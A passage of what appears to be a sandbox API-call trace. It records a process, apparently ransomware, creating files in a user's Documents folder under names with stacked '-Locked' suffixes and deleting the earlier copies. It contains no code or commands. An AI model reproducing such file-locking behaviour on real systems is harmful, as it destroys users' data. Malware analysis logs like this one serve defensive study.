lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.320] GetFileType (hFile=0x49c) returned 0x1 [0302.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.320] GetFileType (hFile=0x49c) returned 0x1 [0302.322] CloseHandle (hObject=0x49c) returned 1 [0302.323] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HBfGjDyK.doc-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\HBfGjDyK.doc-Locked", lpFilePart=0x0) returned 0x33 [0302.323] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HBfGjDyK.doc-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\hbfgjdyk.doc-locked")) returned 1 [0302.323] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HBfGjDyK.doc-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\HBfGjDyK.doc-Locked-Locked-Locked", lpFilePart=0x0) returned 0x41 [0302.323] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.323] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HBfGjDyK.doc-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\hbfgjdyk.doc-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.324] GetFileType (hFile=0x49c) returned 0x1 [0302.324] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.324] GetFileType (hFile=0x49c) returned 0x1 [0302.326] CloseHandle (hObject=0x49c) returned 1 [0302.332] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HBfGjDyK.doc-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\HBfGjDyK.doc-Locked-Locked", lpFilePart=0x0) returned 0x3a [0302.332] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HBfGjDyK.doc-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\hbfgjdyk.doc-locked-locked")) returned 1 [0302.333] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HUM 71h6W.pdf-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\HUM 71h6W.pdf-Locked-Locked", lpFilePart=0x0) returned 0x3b [0302.333] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.333] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HUM 71h6W.pdf-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\hum 71h6w.pdf-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.333] GetFileType (hFile=0x49c) returned 0x1 [0302.333] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.333] GetFileType (hFile=0x49c) returned 0x1 [0302.335] CloseHandle (hObject=0x49c) returned 1 [0302.336] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HUM 71h6W.pdf-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\HUM 71h6W.pdf-Locked", lpFilePart=0x0) returned 0x34 [0302.336] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HUM 71h6W.pdf-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\hum 71h6w.pdf-locked")) returned 1 [0302.339] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HUM 71h6W.pdf-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\HUM 71h6W.pdf-Locked-Locked-Locked", lpFilePart=0x0) returned 0x42 [0302.339] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.339] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HUM 71h6W.pdf-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\hum 71h6w.pdf-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.339] GetFileType (hFile=0x49c) returned 0x1 [0302.339] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.339] GetFileType (hFile=0x49c) returned 0x1 [0302.341] CloseHandle (hObject=0x49c) returned 1 [0302.342] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HUM 71h6W.pdf-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\HUM 71h6W.pdf-Locked-Locked", lpFilePart=0x0) returned 0x3b [0302.342] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HUM 71h6W.pdf-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\hum 71h6w.pdf-locked-locked")) returned 1 [0302.342] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\joed-0tT3pwKPHxST7.pptx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\joed-0tT3pwKPHxST7.pptx-Locked-Locked", lpFilePart=0x0) returned 0x45 [0302.342] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.343] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\joed-0tT3pwKPHxST7.pptx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\joed-0tt3pwkphxst7.pptx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.343] GetFileType (hFile=0x49c) returned 0x1 [0302.343] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.343] GetFileType (hFile=0x49c) returned 0x1 [0302.345] CloseHandle (hObject=0x49c) returned 1 [0302.345] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\joed-0tT3pwKPHxST7.pptx-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\joed-0tT3pwKPHxST7.pptx-Locked", lpFilePart=0x0) returned 0x3e [0302.345] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\joed-0tT3pwKPHxST7.pptx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\joed-0tt3pwkphxst7.pptx-locked")) returned 1 [0302.347] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\joed-0tT3pwKPHxST7.pptx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\joed-0tT3pwKPHxST7.pptx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4c [0302.347] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.347] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\joed-0tT3pwKPHxST7.pptx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\joed-0tt3pwkphxst7.pptx-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.348] GetFileType (hFile=0x49c) returned 0x1 [0302.348] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.348] GetFileType (hFile=0x49c) returned 0x1 [0302.350] CloseHandle (hObject=0x49c) returned 1 [0302.350] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\joed-0tT3pwKPHxST7.pptx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\joed-0tT3pwKPHxST7.pptx-Locked-Locked", lpFilePart=0x0) returned 0x45 [0302.350] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\joed-0tT3pwKPHxST7.pptx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\joed-0tt3pwkphxst7.pptx-locked-locked")) returned 1 [0302.351] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\jYYuHN3_bnMiF1-mgPtc.ots-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\jYYuHN3_bnMiF1-mgPtc.ots-Locked-Locked", lpFilePart=0x0) returned 0x46 [0302.351] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.351] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\jYYuHN3_bnMiF1-mgPtc.ots-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\jyyuhn3_bnmif1-mgptc.ots-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.352] GetFileType (hFile=0x49c) returned 0x1 [0302.352] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.352] GetFileType (hFile=0x49c) returned 0x1 [0302.354] CloseHandle (hObject=0x49c) returned 1 [0302.354] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\jYYuHN3_bnMiF1-mgPtc.ots-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\jYYuHN3_bnMiF1-mgPtc.ots-Locked", lpFilePart=0x0) returned 0x3f [0302.354] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\jYYuHN3_bnMiF1-mgPtc.ots-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\jyyuhn3_bnmif1-mgptc.ots-locked")) returned 1 [0302.355] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\jYYuHN3_bnMiF1-mgPtc.ots-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\jYYuHN3_bnMiF1-mgPtc.ots-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4d [0302.355] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.355] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\jYYuHN3_bnMiF1-mgPtc.ots-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\jyyuhn3_bnmif1-mgptc.ots-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.355] GetFileType (hFile=0x49c) returned 0x1 [0302.356] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.356] GetFileType (hFile=0x49c) returned 0x1 [0302.357] CloseHandle (hObject=0x49c) returned 1 [0302.358] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\jYYuHN3_bnMiF1-mgPtc.ots-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\jYYuHN3_bnMiF1-mgPtc.ots-Locked-Locked", lpFilePart=0x0) returned 0x46 [0302.358] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\jYYuHN3_bnMiF1-mgPtc.ots-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\jyyuhn3_bnmif1-mgptc.ots-locked-locked")) returned 1 [0302.358] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\NyM PGDB-5 iHZerCT.doc-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\NyM PGDB-5 iHZerCT.doc-Locked-Locked", lpFilePart=0x0) returned 0x44 [0302.358] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.359] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\NyM PGDB-5 iHZerCT.doc-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\nym pgdb-5 ihzerct.doc-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.359] GetFileType (hFile=0x49c) returned 0x1 [0302.359] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.359] GetFileType (hFile=0x49c) returned 0x1 [0302.361] CloseHandle (hObject=0x49c) returned 1 [0302.361] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\NyM PGDB-5 iHZerCT.doc-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\NyM PGDB-5 iHZerCT.doc-Locked", lpFilePart=0x0) returned 0x3d [0302.361] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\NyM PGDB-5 iHZerCT.doc-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\nym pgdb-5 ihzerct.doc-locked")) returned 1 [0302.362] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\NyM PGDB-5 iHZerCT.doc-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\NyM PGDB-5 iHZerCT.doc-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4b [0302.362] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.362] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\NyM PGDB-5 iHZerCT.doc-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\nym pgdb-5 ihzerct.doc-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.363] GetFileType (hFile=0x49c) returned 0x1 [0302.363] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.363] GetFileType (hFile=0x49c) returned 0x1 [0302.365] CloseHandle (hObject=0x49c) returned 1 [0302.365] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\NyM PGDB-5 iHZerCT.doc-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\NyM PGDB-5 iHZerCT.doc-Locked-Locked", lpFilePart=0x0) returned 0x44 [0302.365] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\NyM PGDB-5 iHZerCT.doc-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\nym pgdb-5 ihzerct.doc-locked-locked")) returned 1 [0302.389] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\o4aClzZ-jet.doc-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\o4aClzZ-jet.doc-Locked-Locked", lpFilePart=0x0) returned 0x3d [0302.389] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.389] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\o4aClzZ-jet.doc-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\o4aclzz-jet.doc-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.390] GetFileType (hFile=0x49c) returned 0x1 [0302.390] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.390] GetFileType (hFile=0x49c) returned 0x1 [0302.392] CloseHandle (hObject=0x49c) returned 1 [0302.394] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\o4aClzZ-jet.doc-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\o4aClzZ-jet.doc-Locked", lpFilePart=0x0) returned 0x36 [0302.395] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\o4aClzZ-jet.doc-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\o4aclzz-jet.doc-locked")) returned 1 [0302.395] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\o4aClzZ-jet.doc-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\o4aClzZ-jet.doc-Locked-Locked-Locked", lpFilePart=0x0) returned 0x44 [0302.395] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.395] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\o4aClzZ-jet.doc-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\o4aclzz-jet.doc-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.396] GetFileType (hFile=0x49c) returned 0x1 [0302.396] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.396] GetFileType (hFile=0x49c) returned 0x1 [0302.398] CloseHandle (hObject=0x49c) returned 1 [0302.398] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\o4aClzZ-jet.doc-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\o4aClzZ-jet.doc-Locked-Locked", lpFilePart=0x0) returned 0x3d [0302.398] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\o4aClzZ-jet.doc-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\o4aclzz-jet.doc-locked-locked")) returned 1 [0302.399] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\pA5CsH5h5CcswZCjqi.docx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\pA5CsH5h5CcswZCjqi.docx-Locked-Locked", lpFilePart=0x0) returned 0x45 [0302.399] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.399] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\pA5CsH5h5CcswZCjqi.docx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\pa5csh5h5ccswzcjqi.docx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.399] GetFileType (hFile=0x49c) returned 0x1 [0302.399] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.399] GetFileType (hFile=0x49c) returned 0x1 [0302.401] CloseHandle (hObject=0x49c) returned 1 [0302.402] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\pA5CsH5h5CcswZCjqi.docx-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\pA5CsH5h5CcswZCjqi.docx-Locked", lpFilePart=0x0) returned 0x3e [0302.402] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\pA5CsH5h5CcswZCjqi.docx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\pa5csh5h5ccswzcjqi.docx-locked")) returned 1 [0302.403] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\pA5CsH5h5CcswZCjqi.docx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\pA5CsH5h5CcswZCjqi.docx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4c [0302.403] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.403] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\pA5CsH5h5CcswZCjqi.docx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\pa5csh5h5ccswzcjqi.docx-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.403] GetFileType (hFile=0x49c) returned 0x1 [0302.403] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.403] GetFileType (hFile=0x49c) returned 0x1 [0302.405] CloseHandle (hObject=0x49c) returned 1 [0302.406] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\pA5CsH5h5CcswZCjqi.docx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\pA5CsH5h5CcswZCjqi.docx-Locked-Locked", lpFilePart=0x0) returned 0x45 [0302.406] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\pA5CsH5h5CcswZCjqi.docx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\pa5csh5h5ccswzcjqi.docx-locked-locked")) returned 1 [0302.406] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\W7ZbDBvsnGLTRWeGfJh.pptx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\W7ZbDBvsnGLTRWeGfJh.pptx-Locked-Locked", lpFilePart=0x0) returned 0x46 [0302.407] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.407] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\W7ZbDBvsnGLTRWeGfJh.pptx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\w7zbdbvsngltrwegfjh.pptx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.407] GetFileType (hFile=0x49c) returned 0x1 [0302.407] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.407] GetFileType (hFile=0x49c) returned 0x1 [0302.409] CloseHandle (hObject=0x49c) returned 1 [0302.409] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\W7ZbDBvsnGLTRWeGfJh.pptx-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\W7ZbDBvsnGLTRWeGfJh.pptx-Locked", lpFilePart=0x0) returned 0x3f [0302.409] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\W7ZbDBvsnGLTRWeGfJh.pptx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\w7zbdbvsngltrwegfjh.pptx-locked")) returned 1 [0302.410] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\W7ZbDBvsnGLTRWeGfJh.pptx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\W7ZbDBvsnGLTRWeGfJh.pptx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4d [0302.410] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.410] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\W7ZbDBvsnGLTRWeGfJh.pptx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\w7zbdbvsngltrwegfjh.pptx-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.411] GetFileType (hFile=0x49c) returned 0x1 [0302.411] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.411] GetFileType (hFile=0x49c) returned 0x1 [0302.413] CloseHandle (hObject=0x49c) returned 1 [0302.413] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\W7ZbDBvsnGLTRWeGfJh.pptx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\W7ZbDBvsnGLTRWeGfJh.pptx-Locked-Locked", lpFilePart=0x0) returned 0x46 [0302.413] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\W7ZbDBvsnGLTRWeGfJh.pptx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\w7zbdbvsngltrwegfjh.pptx-locked-locked")) returned 1 [0302.415] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\yPcZCDl_ldX.pptx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\yPcZCDl_ldX.pptx-Locked-Locked", lpFilePart=0x0) returned 0x3e [0302.415] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.415] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\yPcZCDl_ldX.pptx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ypczcdl_ldx.pptx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.415] GetFileType (hFile=0x49c) returned 0x1 [0302.415] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.415] GetFileType (hFile=0x49c) returned 0x1 [0302.420] CloseHandle (hObject=0x49c) returned 1 [0302.420] GetFullPathNameW (in: 